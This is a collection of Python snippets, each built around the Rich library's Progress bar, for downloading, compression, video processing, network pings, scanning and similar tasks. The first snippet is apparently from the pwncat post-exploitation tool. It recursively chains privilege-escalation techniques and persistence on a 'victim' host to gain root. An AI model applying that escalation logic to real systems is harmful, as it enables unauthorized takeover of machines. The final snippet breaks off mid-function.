Example 1
    def _escalate(
        self,
        progress: Progress,
        target_user: str = None,
        exclude: Optional[List[str]] = None,
        depth: int = None,
        chain: List["Technique"] = None,
        starting_user=None,
    ) -> List[Tuple["Technique", str]]:
        """ Search for a technique chain which will gain access as the given
        user. """

        if chain is None:
            chain = []

        if exclude is None:
            exclude = []

        if target_user is None:
            target_user = "******"

        # Add a new task to this privesc progress
        task = progress.add_task(
            "description",
            from_user=pwncat.victim.whoami(),
            to_user=target_user,
            status="persistence",
            step="",
            total=40,
        )

        current_user = pwncat.victim.current_user
        if (target_user == current_user.name or current_user.id == 0
                or current_user.name == "root"):
            raise PrivescError(f"you are already {current_user.name}")

        if starting_user is None:
            starting_user = current_user

        if depth is not None and len(chain) > depth:
            raise PrivescError("max depth reached")

        # Capture current shell level
        shlvl = pwncat.victim.getenv("SHLVL")

        installed = list(pwncat.victim.persist.installed)

        # Check if we have a persistence method for this user
        for user, persist in installed:
            if not persist.local or (user != target_user and user is not None):
                continue
            progress.update(task, step=str(persist))
            # Attempt to escalate with the local persistence method
            if persist.escalate(target_user):

                # Stabilize the terminal
                pwncat.victim.reset(hard=False)

                # The method thought it worked, but didn't appear to
                if pwncat.victim.update_user() != target_user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                # It worked!
                chain.append(
                    (f"persistence - {persist.format(target_user)}", "exit"))
                return chain

        # We update the status to enumerating and move the progress forward
        # but also stop the task to show the "pulsating" bar. This is because
        # we don't have a way of knowing how many things we will enumerate.
        progress.update(task, status="enumerating", step="initializing")

        # Enumerate escalation options for this user
        techniques = {}
        for method in self.methods:
            if method.id in exclude:
                continue
            try:
                found_techniques = method.enumerate(
                    progress,
                    task,
                    Capability.SHELL | Capability.WRITE | Capability.READ,
                )
                for tech in found_techniques:
                    progress.update(task, step=str(tech))
                    if tech.user not in techniques:
                        techniques[tech.user] = []
                    techniques[tech.user].append(tech)
            except PrivescError:
                pass

        # Try to escalate directly to the target if possible
        if target_user in techniques:
            progress.update(task,
                            status="escalating",
                            step="[yellow]direct escalation[/yellow]")
            try:
                tech, exit_command = self.escalate_single(
                    techniques[target_user], shlvl, progress, task)
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
                chain.append((tech, exit_command))
                return chain
            except PrivescError:
                pass

        # Try to use persistence as other users
        progress.update(task, status="persistence", step="initializing")
        for user, persist in installed:
            if self.in_chain(user, chain):
                continue
            progress.update(task, step=persist.format(user))
            if persist.escalate(user):

                # Ensure history and prompt are correct
                pwncat.victim.reset()

                # Update the current user
                if pwncat.victim.update_user() != user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                chain.append((f"persistence - {persist.format(user)}", "exit"))

                try:
                    return self._escalate(progress, target_user, exclude,
                                          depth, chain, starting_user)
                except PrivescError:
                    chain.pop()
                    pwncat.victim.run("exit", wait=False)

                # Don't retry later
                if user in techniques:
                    del techniques[user]

        progress.update(task, status="recursing")

        # We can't escalate directly to the target. Instead, try recursively
        # against other users.
        for user, techs in techniques.items():
            if user == target_user:
                continue
            if self.in_chain(user, chain):
                continue
            try:
                progress.update(task,
                                step=f"escalating to [green]{user}[/green]")
                tech, exit_command = self.escalate_single(
                    techs, shlvl, progress, task)

                chain.append((tech, exit_command))
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
            except PrivescError:
                continue
            try:
                progress.update(
                    task, step=f"success, recursing as [green]{user}[/green]")
                return self._escalate(progress, target_user, exclude, depth,
                                      chain, starting_user)
            except PrivescError:
                tech, exit_command = chain[-1]
                pwncat.victim.run(exit_command, wait=False)
                chain.pop()

        raise PrivescError(f"no route to {target_user} found")
Example 2
    def __init__(
        self,
        project: str = None,
        break_on_fail: bool = False,
        get_all: bool = False,
        source: tuple = (),
        source_path_file: pathlib.Path = None,
        destination: pathlib.Path = pathlib.Path(""),
        silent: bool = False,
        verify_checksum: bool = False,
        method: str = "get",
        no_prompt: bool = False,
        token_path: str = None,
    ):
        """Handle actions regarding downloading data."""
        # Initiate DDSBaseClass to authenticate user
        super().__init__(
            project=project,
            dds_directory=destination,
            method=method,
            no_prompt=no_prompt,
            token_path=token_path,
        )

        # Initiate DataGetter specific attributes
        self.break_on_fail = break_on_fail
        self.verify_checksum = verify_checksum
        self.silent = silent
        self.filehandler = None

        # Only method "get" can use the DataGetter class
        if self.method != "get":
            raise dds_cli.exceptions.InvalidMethodError(
                attempted_method=self.method,
                message="DataGetter attempting unauthorized method",
            )

        # Start file prep progress
        with Progress(
            "[bold]{task.description}",
            SpinnerColumn(spinner_name="dots12", style="white"),
            console=dds_cli.utils.stderr_console,
        ) as progress:
            wait_task = progress.add_task("Collecting and preparing data", step="prepare")
            self.filehandler = fhr.RemoteFileHandler(
                get_all=get_all,
                user_input=(source, source_path_file),
                token=self.token,
                project=self.project,
                destination=self.dds_directory.directories["FILES"],
            )

            if self.filehandler.failed and self.break_on_fail:
                raise dds_cli.exceptions.DownloadError(
                    ":warning-emoji: Some specified files were not found in the system "
                    "and '--break-on-fail' flag used. :warning-emoji:"
                    f"Files not found: {self.filehandler.failed}"
                )

            if not self.filehandler.data:
                if self.temporary_directory and self.temporary_directory.is_dir():
                    LOG.debug(f"Deleting temporary folder {self.temporary_directory}.")
                    dds_cli.utils.delete_folder(self.temporary_directory)
                raise dds_cli.exceptions.DownloadError("No files to download.")

            self.status = self.filehandler.create_download_status_dict()

            progress.remove_task(wait_task)
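
A minimal instantiation sketch for the class above; the project id and destination path are placeholders, and authentication is handled by the DDSBaseClass initializer:

getter = DataGetter(
    project="project_id",
    get_all=True,
    destination=pathlib.Path("downloads"),
)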
Example 3
def event(jid="all", tag=None, progress="log", stop_signal=None):
    """
    Function to listen to events emitted by Nornir Proxy Minions. Matched
    event printed to terminal.

    :param tag: (str) tag regex string, default is ``nornir\-proxy/.*``
    :param jid: (int, str) Job ID to listen events for, default is ``all``
    :param progress: (str) progress display mode - ``log``, ``raw``, ``bars``, ``tree``
    :param stop_signal: (obj) thread Event object, stops listening to events if ``stop_signal.is_set()``,
        if ``stop_signal is None``, listens and print events until keyboard interrupt hit - ``ctrl+c``

    ``bars`` and ``tree`` progress display modes use the Rich library; to properly
    display various symbols and characters, make sure your environment uses utf-8
    encoding, for example by running these commands::

        [root@salt-master ~]# PYTHONIOENCODING=utf-8
        [root@salt-master ~]# export PYTHONIOENCODING
    """
    # start rich console
    globals().setdefault("console", Console())

    stop_signal = stop_signal or Event()
    events_queue = queue.Queue()
    tag = (
        tag
        if tag
        else (
            r"nornir\-proxy\/.*"
            if jid == "all"
            else r"nornir\-proxy\/{jid}\/.*".format(jid=jid)
        )
    )
    # start events thread
    listen_events_thread = Thread(
        target=_get_salt_nornir_event,
        kwargs={"stop_signal": stop_signal, "tag": tag, "events_queue": events_queue},
        daemon=True,  # to not block once main process finishes
    )
    listen_events_thread.start()
    # display events
    if HAS_RICH and progress == "bars":
        tasks = {}
        stop_events_loop = Event()
        rich_progress = Progress(
            TextColumn("{task.description}"),
            BarColumn(),
            TextColumn("{task.percentage:>3.0f}%"),
            TextColumn("{task.completed}/{task.total}"),
            TimeElapsedColumn(),
            TextColumn("{task.fields[info]}"),
            TextColumn("{task.fields[status]}"),
            refresh_per_second=5,
        )
        # listen to events indefinitely if stop_signal is None
        with rich_progress:
            while True:
                try:
                    e = events_queue.get(timeout=1)
                except queue.Empty:
                    continue
                finally:
                    # check if need to finish
                    if stop_signal.is_set() and all(
                        [t.finished for t in rich_progress.tasks]
                    ):
                        stop_events_loop.set()
                        break
                edata = e["data"]
                jid = edata["jid"]
                task_type = edata["task_type"]
                task_event = edata["task_event"]
                status = edata["status"]
                task_name = edata["task_name"]
                status_str = (
                    f"[red]{status}" if status == "FAILED" else f"[green]{status}"
                )
                description_str = (
                    "[blue]{timestamp}[/]:{user}:{jid}:[bright_magenta]{function}[/]"
                )
                # catch task started events and add new progress bar
                if task_type == "task" and task_event == "started":
                    # if job runs on multiple proxy minions
                    if jid in tasks:
                        task = rich_progress.tasks[tasks[jid]]
                        task.total += len(edata["hosts"])
                        rich_progress.update(tasks[jid])
                    else:
                        total = len(edata["hosts"])
                        description = description_str.format(**edata)
                        info = "[cyan]{}[/]:{}".format(
                            task_type, task_name.split(".")[-1]
                        )
                        tasks[jid] = rich_progress.add_task(
                            description, total=total, info=info, status=status
                        )
                # catch task instance end events to advance progress bar
                elif task_type == "task_instance" and task_event == "completed":
                    if jid in tasks:
                        task = rich_progress.tasks[tasks[jid]]
                        if status == "PASSED":
                            rich_progress.update(tasks[jid], advance=1)
                        if task.completed >= task.total or status == "FAILED":
                            rich_progress.tasks[tasks[jid]].fields[
                                "status"
                            ] = status_str
                elif task_type == "task" and task_event == "completed":
                    if jid in tasks:
                        task = rich_progress.tasks[tasks[jid]]
                        if task.completed >= task.total or status == "FAILED":
                            rich_progress.tasks[tasks[jid]].fields[
                                "status"
                            ] = status_str
                        rich_progress.stop_task(tasks[jid])
                        # stop all subtasks for this jid and update their status
                        for task in tasks:
                            if task.startswith(jid):
                                rich_progress.tasks[tasks[task]].fields[
                                    "status"
                                ] = status_str
                                rich_progress.stop_task(tasks[task])
                # handle subtask progress
                elif task_type == "subtask" and task_event == "started":
                    tid = "{jid}:{task_name}".format(**edata)
                    if tid not in tasks and jid in tasks:
                        total = rich_progress.tasks[tasks[jid]].total
                        description = description_str.format(**edata)
                        info = "[cyan]{task_type}[/]:{task_name}".format(**edata)
                        tasks[tid] = rich_progress.add_task(
                            description, total=total, info=info, status=status
                        )
                    # update task total if got additional start events
                    elif tid in tasks and jid in tasks:
                        task = rich_progress.tasks[tasks[tid]]
                        task.total = rich_progress.tasks[tasks[jid]].total
                        rich_progress.update(tasks[tid])
                elif task_type == "subtask" and task_event == "completed":
                    tid = "{jid}:{task_name}".format(**edata)
                    if tid in tasks:
                        task = rich_progress.tasks[tasks[tid]]
                        if status == "PASSED":
                            rich_progress.update(tasks[tid], advance=1)
                        if task.completed >= task.total or status == "FAILED":
                            rich_progress.tasks[tasks[tid]].fields[
                                "status"
                            ] = status_str
                # hide tasks beyond vertical overflow point
                hght = console.size.height - 2
                for tindx, _ in enumerate(rich_progress.tasks[:-hght]):
                    rich_progress.update(tindx, visible=False)
    elif progress == "tree":
        pass
    elif progress == "raw":
        while not stop_signal.is_set():
            try:
                e = events_queue.get(timeout=1)
                print(e)
            except queue.Empty:
                continue
    # handle 'log' progress mode
    else:
        while not stop_signal.is_set():
            try:
                e = events_queue.get(timeout=1)
            except queue.Empty:
                continue
            edata = e["data"]
            # form message string and print it
            if edata["task_type"] == "task":
                edata["hs"] = ", ".join(edata["hosts"])
            elif edata["task_type"] in ["task_instance", "subtask"]:
                edata["hs"] = edata["host"]
            msg = "{timestamp}:{user}:{jid}:{proxy_id}:w{worker_id} {function} {hs} {task_type} {task_event} {task_name}; {status}"
            print(msg.format(**edata))
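
A hedged usage sketch for the listener above; the arguments shown are the defaults plus the Rich bars display mode, and stopping is left to ctrl+c as the docstring describes:

event(jid="all", progress="bars")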
Example 4
from rich.progress import Progress


def test_live_is_not_started_if_progress_is_disabled() -> None:
    progress = Progress(auto_refresh=False, disable=True)

    with progress:
        assert not progress.live._started
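
A complementary check (assumed, not taken from the original suite) exercising the enabled path through the same private attribute:

def test_live_is_started_if_progress_is_enabled() -> None:
    progress = Progress(auto_refresh=False, disable=False)

    with progress:
        assert progress.live._started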
Example 5
import subprocess
from platform import system as system_name  # assumed import for system_name() used below

from rich.console import Console
from rich.progress import BarColumn, Progress, TimeRemainingColumn
from rich.theme import Theme

custom_theme = Theme({
    "success": "bold blue",
    "fail": "bold red",
    "error": "bold yellow",
    "repr.str": "bold white",
    #"repr.number": "bold green", # defaults: python -m rich.theme
})
console = Console(theme=custom_theme)
total_dev = 4
progress = Progress(
    "[progress.description]{task.description}",
    BarColumn(),
    "[progress.percentage]{task.percentage:>3.0f}%",
    TimeRemainingColumn(),
    "{task.completed} of {task.total}",
    console=console,
)
t1 = progress.add_task("Пингую...", total=total_dev)
t2 = progress.add_task("Успешное подключение...", total=total_dev)
t3 = progress.add_task("Ошибка при подключении...", total=total_dev)


def ping_ip(ip):
    param = "-n" if system_name().lower() == "windows" else "-c"
    command = ["ping", param, "3", ip]
    reply = subprocess.run(command,
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
    progress.update(t1, advance=1)
    # advance the success or failure bar based on the ping result
    if reply.returncode == 0:
        progress.update(t2, advance=1)
    else:
        progress.update(t3, advance=1)
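
A hypothetical driver for the snippet above: run the pings in worker threads inside the progress context so the bars advance as results come in (ip_list is a placeholder):

from concurrent.futures import ThreadPoolExecutor

ip_list = ["192.168.0.1", "192.168.0.2", "192.168.0.3", "192.168.0.4"]

with progress:
    with ThreadPoolExecutor(max_workers=4) as executor:
        # each call advances t1 and either t2 or t3
        list(executor.map(ping_ip, ip_list))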
Example 6
    def do_one_mod(self, names: List[str], infer: bool, exec_: bool,
                   conf: dict):
        """
        Crawl one modules and stores resulting docbundle in self.store.

        Parameters
        ----------
        names : List[str]
            list of (sub)modules names to generate docbundle for.
            The first is considered the root module.
        infer : bool
            Wether to run type inference with jedi.
        exec_ : bool
            Wether to try to execute the code blocks and embed resulting values like plots.
        """

        p = lambda: Progress(
            TextColumn("[progress.description]{task.description}",
                       justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "[progress.completed]{task.completed} / {task.total}",
            TimeElapsedColumn(),
        )
        # step one collect all the modules instances we want to analyse.

        modules = []
        for name in names:
            x, *r = name.split(".")
            n0 = __import__(name)
            for sub in r:
                n0 = getattr(n0, sub)
            modules.append(n0)

        # step 2 try to guess the version number from the top module.
        version = getattr(modules[0], "__version__", "???")

        root = names[0].split(".")[0]
        module_conf = conf.get(root, {})
        examples_folder = module_conf.get("examples_folder", None)
        print("EF", examples_folder)
        if examples_folder is not None:
            examples_folder = Path(examples_folder).expanduser()
            examples_data = self.collect_examples(examples_folder)
            for edoc, figs in examples_data:
                self.examples.update(
                    {k: json.dumps(v.to_json())
                     for k, v in edoc.items()})
                for name, data in figs:
                    print("put one fig", name)
                    self.put_raw(name, data)
        print("Configuration:", json.dumps(module_conf, indent=2))
        self.root = root
        self.version = version
        subs = module_conf.get("submodules", [])
        extra_from_conf = [root + "." + s for s in subs]
        for name in extra_from_conf:
            x, *r = name.split(".")
            n0 = __import__(name)
            for sub in r:
                n0 = getattr(n0, sub)
            modules.append(n0)

        # print(modules)

        collector = DFSCollector(modules[0], modules[1:])
        collected: Dict[str, Any] = collector.items()

        # collect all items we want to document.
        # iterate over a copy, since entries may be deleted during the loop
        for qa, item in list(collected.items()):
            if (nqa := full_qual(item)) != qa:
                print("after import qa differs : {qa} -> {nqa}")
                if collected[nqa] == item:
                    print("present twice")
                    del collected[nqa]
                else:
                    print("differs: {item} != {other}")
Example 7
import io

from rich.console import Console
from rich.progress import Progress


def make_progress() -> Progress:
    _time = 0.0

    def fake_time():
        nonlocal _time
        try:
            return _time
        finally:
            _time += 1

    console = Console(
        file=io.StringIO(),
        force_terminal=True,
        color_system="truecolor",
        width=80,
        legacy_windows=False,
        _environ={},
    )
    progress = Progress(console=console,
                        get_time=fake_time,
                        auto_refresh=False)
    task1 = progress.add_task("foo")
    task2 = progress.add_task("bar", total=30)
    progress.advance(task2, 16)
    task3 = progress.add_task("baz", visible=False)
    task4 = progress.add_task("egg")
    progress.remove_task(task4)
    task4 = progress.add_task("foo2", completed=50, start=False)
    progress.stop_task(task4)
    progress.start_task(task4)
    progress.update(task4,
                    total=200,
                    advance=50,
                    completed=200,
                    visible=True,
                    refresh=True)
    progress.stop_task(task4)
    return progress
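
A sketch of how a fixture like this is typically consumed; the fake clock makes elapsed times deterministic, so the captured output can be compared against a known-good string (EXPECTED is a placeholder):

def test_render_sketch() -> None:
    progress = make_progress()
    with progress:
        pass
    output = progress.console.file.getvalue()
    assert output  # a real test would compare against EXPECTED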
Example 8
from rich.progress import BarColumn, Progress


def staticproc(name: str, process):
    """For processes where progress can not be determined"""
    with Progress(f"[magenta]{name}...", BarColumn()) as progress:
        task = progress.add_task(name, start=False)
        process()
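
Example use (hypothetical): wrap a call whose duration can't be measured; because the task is never started, the bar renders in its indeterminate, pulsing state:

import time

staticproc("Indexing", lambda: time.sleep(5))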
Example 9
def process_file(filename: Path, threshold, delete):
    if filename.suffix == ".zst":
        logging.info(f'"{filename}" is already compressed')
        return

    compr_file_name = get_compressed_file_name(filename)
    if compr_file_name.exists() and compr_file_name.is_file():
        logging.info(
            f'"{filename}" already has a compressed copy, "{compr_file_name}"')
        return

    json_file_name = get_json_file_name(filename)

    try:
        with json_file_name.open("rt") as inpf:
            compr_info = json.load(inpf)

        # We were able to find the file and read it, so it means there is
        # no need to process the file.
        logging.info(
            f'"{filename}" has already been tested ({compr_info["compression_ratio"]:.1f}%)'
        )
        return
    except Exception:
        pass

    buf = BytesIO()
    uncompr_len = filename.stat().st_size

    with Progress() as progress:
        task = progress.add_task(filename.name, total=uncompr_len)

        def callback(total_input, total_output, read_data, write_data):
            progress.update(task, completed=total_input)

        with filename.open("rb") as inpf:
            pyzstd.compress_stream(
                inpf,
                buf,
                level_or_option=9,
                callback=callback,
                read_size=13_107_200,
                write_size=13_159_100,
            )

    compr_len = len(buf.getvalue())
    compr_ratio = compr_len / uncompr_len * 100
    logging.info(
        f'"{filename}": {uncompr_len} → {compr_len} ({compr_ratio:.2f}%)')

    if compr_ratio < threshold:
        compr_filename = Path(str(filename) + ".zst")
        with compr_filename.open("wb") as outf:
            outf.write(buf.getvalue())
        logging.info(f'File "{compr_filename}" has been written')

        if delete:
            filename.unlink()
            logging.info(f'File "{filename}" was deleted')

    with open(json_file_name, "wt") as outf:
        json.dump(
            {
                "uncompressed_size": uncompr_len,
                "compressed_size": compr_len,
                "filename": str(filename),
                "compression_ratio": compr_ratio,
                "date": str(datetime.now()),
            },
            outf,
        )
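
A hypothetical driver for the function above: walk a tree and test-compress every file, keeping the .zst copy only when the ratio beats a 90% threshold:

for path in Path("data").rglob("*"):
    if path.is_file():
        process_file(path, threshold=90.0, delete=False)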
Example 10
class Video:
    def __init__(self, src: str):
        self.src = src
        is_webcam = lambda x: isinstance(x, int)
        self.display = 'webcam' if is_webcam(src) \
            else osp.basename(src)

        # Read Input Video
        self.video_capture = cv2.VideoCapture(src)
        if not self.video_capture.isOpened():
            self._fail(
                f"[bold red]Error:[/bold red] '{self.src}' does not seem to be a video file supported by OpenCV. If the video file is not the problem, please check that your OpenCV installation is working correctly."
            )
        self.total_frames = 0 if is_webcam(src) \
            else int(self.video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
        self.frame_cnt = 0

        description = 'Run'
        # Setup progressbar
        if self.display:
            description += f" | {self.display}"

        progress_bar_fields: List[Union[str, ProgressColumn]] = [
            "[progress.description]{task.description}",
            BarColumn(),
            "[yellow]{task.fields[process_fps]:.2f}fps[/yellow]",
        ]
        progress_bar_fields.insert(
            2, "[progress.percentage]{task.percentage:>3.0f}%")
        progress_bar_fields.insert(
            3,
            TimeRemainingColumn(),
        )
        self.progress_bar = Progress(
            *progress_bar_fields,
            auto_refresh=False,
            redirect_stdout=False,
            redirect_stderr=False,
        )
        self.task = self.progress_bar.add_task(
            self.abbreviate_description(description),
            total=self.total_frames,
            start=self.src,
            process_fps=0,
        )

    # This is a generator, note the yield keyword below.
    def __iter__(self):
        with self.progress_bar as progress_bar:
            start = time.time()
            # Iterate over video
            while True:
                self.frame_cnt += 1
                ret, img = self.video_capture.read()
                if ret is False or img is None:
                    break
                self.fps = self.frame_cnt / (time.time() - start)
                progress_bar.update(self.task,
                                    advance=1,
                                    refresh=True,
                                    process_fps=self.fps)
                yield img
            self.stop()

    def stop(self):
        self.frame_cnt = 0
        self.video_capture.release()
        cv2.destroyAllWindows()

    def _fail(self, msg: str):
        print(msg)
        exit()

    def show(self,
             frame: np.ndarray,
             winname: str = 'show',
             downsample_ratio: float = 1.0):
        # Resize to lower resolution for faster streaming over slow connections
        if self.frame_cnt == 1:
            cv2.namedWindow(winname, cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO)
            cv2.resizeWindow(winname, 640, 480)
            cv2.moveWindow(winname, 20, 20)

        if downsample_ratio != 1.0:
            # cv2.resize requires an integer (width, height) tuple
            frame = cv2.resize(
                frame,
                (
                    int(frame.shape[1] // downsample_ratio),
                    int(frame.shape[0] // downsample_ratio),
                ),
            )
        cv2.imshow(winname, frame)
        return cv2.waitKey(1)

    def get_writer(self, frame, output_path, fps=20):
        output_path = osp.join(
            output_path, osp.splitext(osp.basename(self.src))[0]+'.avi') \
            if output_path[-4:] != '.avi' else output_path
        fourcc = cv2.VideoWriter_fourcc(*"XVID")
        output_size = (frame.shape[1], frame.shape[0]
                       )  # OpenCV format is (width, height)
        writer = cv2.VideoWriter(output_path, fourcc, fps, output_size)
        print(f'[INFO] Writing output to {output_path}')
        return writer

    def get_output_file_path(self, output_folder, suffix: List = []) -> str:
        os.makedirs(output_folder, exist_ok=True)
        filename = '{}_' * (len(suffix) + 1)
        filename = filename.format(
            'webcam'
            if isinstance(self.src, int) else osp.splitext(self.display)[0],
            *iter(suffix))
        output_path = osp.join(output_folder, f'{filename[:-1]}.avi')
        return output_path

    def abbreviate_description(self, description: str) -> str:
        """Conditionally abbreviate description so that progress bar fits in small terminals"""
        terminal_columns, _ = get_terminal_size()
        space_for_description = (int(terminal_columns) - 25
                                 )  # Leave 25 space for progressbar
        if len(description) < space_for_description:
            return description
        else:
            return "{} ... {}".format(
                description[:space_for_description // 2 - 3],
                description[-space_for_description // 2 + 3:],
            )
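
A sketch of the intended consumption pattern (the file name is a placeholder):

video = Video("input.mp4")
for frame in video:
    key = video.show(frame, winname="preview")
    if key & 0xFF == ord("q"):
        break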
Example 11
def install_conda_env(destination,
                      binary=None,
                      auto_add_kernels=True,
                      config=None,
                      console=None):

    destination = os.path.expanduser(destination)

    if not config:
        config = Config()

    if not console:
        console = Console()

    console.print("Update config...")
    des_abspath = os.path.abspath(destination)
    if not config.home_path:
        # overwrite the CHEMCONDA_HOME_PATH in the ~/.chemconda/config.yaml file
        config.home_path = des_abspath
        config.installer = binary
    else:
        if config.home_path != os.path.abspath(destination):
            # overwrite the CHEMCONDA_HOME_PATH in the ~/.chemconda/config.yaml file
            config.home_path = des_abspath

    console.print("Config completed:")
    console.print(config.args_dict())

    console.print("Setup Miniconda...")
    # validate CHEMCONDA_HOME_PATH is consistent to the config.home_path
    if not os.path.exists(config.home_path):
        # install Miniconda3 from remote repository
        conda_download_url = os.path.join(config.remote_repo, config.installer)

        console.print(
            "Cannot find Miniconda installer, downloading from {}".format(
                conda_download_url))
        res = requests.get(conda_download_url,
                           stream=True,
                           allow_redirects=True)
        total_length = res.headers.get('content-length')

        done_event = Event()

        def handle_sigint(signum, frame):
            done_event.set()

        signal.signal(signal.SIGINT, handle_sigint)

        with open(config.installer_path, 'wb') as fw:
            if total_length is None:  # no content length header
                fw.write(res.content)
            else:
                dl = 0
                total_length = int(total_length)
                with Progress() as progress:
                    download_task = progress.add_task("[green]Downloading...",
                                                      total=total_length)
                    for data in res.iter_content(chunk_size=32768):
                        fw.write(data)
                        progress.update(download_task, advance=len(data))
                        if done_event.is_set():
                            return

        console.print("Downloading completed : {}".format(
            config.installer_path))

        console.print("Installing {}...".format(config.installer))
        if os.path.isfile(config.installer_path):
            # ensure bash installed
            os.system("bash {} -b -p {}".format(config.installer_path,
                                                config.home_path))
        console.print("Installing completed.")

        console.print("Start installing base dependencies...")
        # install sidecar in the base env
        install_packages(package_names=['jedi=0.18', 'mamba'],
                         env_name='base',
                         add_channels=['conda-forge'],
                         config=config,
                         console=console)
        console.print("Installing completed.")

        # show the installed Miniconda3 home path
        console.print("Setup completed: conda installed at {}".format(
            config.home_path),
                      style="bold white")
    else:
        if auto_add_kernels:
            # search the config.home_path/envs/ folder to get all the potential kernels.
            env_names = [
                os.path.basename(dirpath)
                for dirpath in glob(os.path.join(config.home_path, 'envs/*'))
            ]
            console.print("Found {} kernels, start to restore...".format(
                len(env_names)))
            for env_name in env_names:
                console.print("Adding kernel {}".format(env_name))
                add_existed_kernel(env_name, config=config, console=console)
            console.print("All kernels have been added.")
Example 12
def _dayone(data: List[DayOneStats]):
    stats_sorted: List[DayOneStats] = sorted(data, key=lambda d: d.Date)
    oldest_stats: DayOneStats = min(data, key=lambda d: d.Date)
    latest_stats: DayOneStats = max(data, key=lambda d: d.Date)

    def get_deltas(stat: str) -> Iterator[int]:
        deltas = [
            getattr(j, stat) - getattr(i, stat)
            for i, j in zip(stats_sorted[:-1], stats_sorted[1:])
        ]

        return iter(deltas)

    def get_dates() -> Iterator[datetime]:
        dates = [s.Date for s in stats_sorted]

        return iter(dates)

    prog_tmpl = (
        "{task.description}",
        BarColumn(),
        "[progress.completed]{task.completed}",
        DayOneStatDateColumn(),
    )

    stat_dates = get_dates()

    first_date = next(stat_dates)

    all_deltas = zip(
        stat_dates,
        get_deltas("confirmed"),
        get_deltas("deaths"),
        get_deltas("recovered"),
        get_deltas("active"),
    )

    first_case_date = oldest_stats.Date.strftime("%b %d %Y")

    HEADER = f"""
    [bold]Stats for [white]{latest_stats.country}[/white][/bold]

    Stats from first recorded case on [cyan]{first_case_date}[/] to date

    Progress bar shows how fast cases by each case type increased over time.
    """

    console.print(Panel(HEADER))

    with Progress(*prog_tmpl) as progress:
        date_task = progress.add_task("Date",
                                      total=len(stats_sorted) - 1,
                                      stat_date=first_date)

        confirmed_task = progress.add_task(
            "[cyan]Confirmed Cases...[/]",
            total=latest_stats.confirmed,
        )
        death_task = progress.add_task("[red]Deaths...",
                                       total=latest_stats.deaths)
        recovered_task = progress.add_task("[green]Recovered.Cases..",
                                           total=latest_stats.recovered)
        active_task = progress.add_task("[yellow]Active Cases...",
                                        total=latest_stats.active)

        for stat_date, confirmed_delta, death_delta, recovered_delta, active_delta in all_deltas:
            progress.update(date_task, advance=1, stat_date=stat_date)

            progress.update(confirmed_task, advance=confirmed_delta)
            progress.update(death_task, advance=death_delta)
            progress.update(recovered_task, advance=recovered_delta)
            progress.update(active_task, advance=active_delta)

            time.sleep(0.2)
Example 13
def exec_tool(  # scan:ignore
        tool_name,
        args,
        cwd=None,
        env=utils.get_env(),
        stdout=subprocess.DEVNULL):
    """
    Convenience method to invoke cli tools

    Args:
      tool_name: Tool name
      args: cli command and args
      cwd: Current working directory
      env: Environment variables
      stdout: stdout configuration for run command

    Returns:
      CompletedProcess instance
    """
    with Progress(
            console=console,
            redirect_stderr=False,
            redirect_stdout=False,
            refresh_per_second=1,
    ) as progress:
        task = None
        try:
            env = use_java(env)
            LOG.debug('⚡︎ Executing {} "{}"'.format(tool_name, " ".join(args)))
            stderr = subprocess.DEVNULL
            if LOG.isEnabledFor(DEBUG):
                stderr = subprocess.STDOUT
            tool_verb = "Scanning with"
            if "init" in tool_name:
                tool_verb = "Initializing"
            elif "build" in tool_name:
                tool_verb = "Building with"
            task = progress.add_task("[green]" + tool_verb + " " + tool_name,
                                     total=100,
                                     start=False)
            cp = subprocess.run(
                args,
                stdout=stdout,
                stderr=stderr,
                cwd=cwd,
                env=env,
                check=False,
                shell=False,
                encoding="utf-8",
            )
            if cp and stdout == subprocess.PIPE:
                for line in cp.stdout:
                    progress.update(task, completed=5)
            if (cp and LOG.isEnabledFor(DEBUG) and cp.returncode
                    and cp.stdout is not None):
                LOG.debug(cp.stdout)
            progress.update(task, completed=100, total=100)
            return cp
        except Exception as e:
            if task:
                progress.update(task, completed=20, total=10, visible=False)
            if not LOG.isEnabledFor(DEBUG):
                LOG.info(
                    f"{tool_name} has reported a few errors. To view them, pass the environment variable SCAN_DEBUG_MODE=debug"
                )
            LOG.debug(e)
            return None
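
A hypothetical call (the tool name and arguments are placeholders):

cp = exec_tool("bandit", ["bandit", "-r", "."], cwd=".")
if cp is not None and cp.returncode != 0:
    LOG.info("scan finished with exit code %d", cp.returncode)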
Example 14
def get_datacloud_catalogue(id_ssodnet, catalogue, progress=False, local=True):
    """Retrieve the datacloud catalogue of one or many asteroids, using their SsODNet IDs.

    Parameters
    ----------
    id_ssodnet : str, list, np.ndarray, pd.Series
        The ssodnet id of the asteroid. Can be one or many.
    catalogue : str, list of str
        The name of the datacloud catalogue to retrieve. Can be one or many.
    progress : bool
        Show progressbar. Default is False.
    local : bool
        If False, forces the remote query of the ssoCard. Default is True.

    Returns
    -------
    list of dict, list of list of dict
        list containing len(catalogue) dictionaries corresponding to
        the catalogues of the passed identifier. If the catalogue is
        not available, the dict is empty.

    Notes
    -----
    Catalogue retrieval is first attempted locally, then remotely via datacloud.
    """
    if isinstance(id_ssodnet, str):
        id_ssodnet = [id_ssodnet]
    elif isinstance(id_ssodnet, pd.Series):
        id_ssodnet = id_ssodnet.values
    elif isinstance(id_ssodnet, (set, tuple)):
        id_ssodnet = list(id_ssodnet)
    elif id_ssodnet is None:
        warnings.warn(f"Received SsODNet ID of type {type(id_ssodnet)}.")
        return [(None, np.nan, None)]
    elif not isinstance(id_ssodnet, (list, np.ndarray)):
        raise TypeError(
            f"Received SsODNet ID of type {type(id_ssodnet)}, expected one of: "
            "str, list, np.ndarray, pd.Series")

    if isinstance(catalogue, str):
        catalogue = [catalogue]
    elif not isinstance(catalogue, (list, np.ndarray)):
        raise TypeError(
            f"Received catalogue of type {type(catalogue)}, expected one of: "
            "str, list, np.ndarray")

    # Flatten input for easier calling
    id_catalogue = list(product(id_ssodnet, catalogue))

    with Progress(disable=not progress) as progress_bar:

        progress = progress_bar.add_task(
            "Getting catalogues" if len(catalogue) > 1 else catalogue[0],
            total=len(id_catalogue),
        )

        # Run async loop to get ssoCard
